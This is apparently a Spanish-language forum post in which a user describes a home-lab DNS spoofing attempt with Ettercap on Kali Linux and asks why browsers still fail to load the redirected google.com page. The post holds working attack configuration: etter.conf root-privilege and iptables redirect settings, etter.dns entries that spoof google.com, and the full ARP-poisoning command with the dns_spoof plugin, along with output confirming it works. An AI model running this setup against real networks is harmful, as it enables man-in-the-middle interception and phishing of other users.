Hola, estoy probando esto de dns spoof en Ettercap, vi varios tutoriales en youtube y hago lo siguiente..
Primero configuro el archivo
/etc/ettercap/etter.confy coloco lo siguiente:
al principio de todo coloco esto:
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Despues en las lineas que estan comentadas abajo las descomento
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Aplico cambios y guardo.despues voy al archivo
/etc/ettercap/etter.dnsAlli coloco el DNS spoof basicamente de la siguiente manera
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
google.com A 192.168.1.138
*.google.com A 192.168.1.138
www.google.com PTR 192.168.1.138
Aplico cambios y guardoInicio mi servidor Apache en mi maquina Kali Linux y verifico que pueda ingresar desde mi pc fisica (windows) efectivamente puedo ingresar sin prolemasInicio despues Ettercap via linea de comandos con lo siguienteettercap -T -q -i eth0 -M arp:remote -P dns_spoof //192.168.1.1// //192.168.1.138//
192.168.1.1 es la puerta de enlace de mi router
192.168.1.138 mi maquina fisica..
Me arroja esta salida:2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 E4:18:6B:64:4B:8C
GROUP 2 : 192.168.1.138 02:94:A1:CB:43:8C
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
despues voy a la maquina fisica y coloco un ping google.com en la consolaefectivamente el ping va dirijido
a lo que seria la ip 192.168.1.138En la consola de Ettercap me salta esto cuando intento abrir google.com en cualquier navegador.
dns_spoof: A [www.google.com] spoofed to [192.168.1.138]
En definitiva el Spoof esta funcionando correctamentesin embargo cuando intento abrir el navegador y coloco google.com, no me carga, intente con internet explorer, google chrome y fiferox.aveces me salta error de certificado y aveces queda cargando y me dice se ha restablecido la conexionCabe destacar que pruebo de nuevo ingresando la IP del apache al que es rederigido y el apache carga normalmente, es decir, esta funcionando.. en la consola salta como que el ping de google.com es esa ip del apache, pero en el navegador no carga, ningun navegador. no se cual es el prolema, si es un error de seguridad de los navegadores o si estoy haciendo algo mal.. gracias un saludo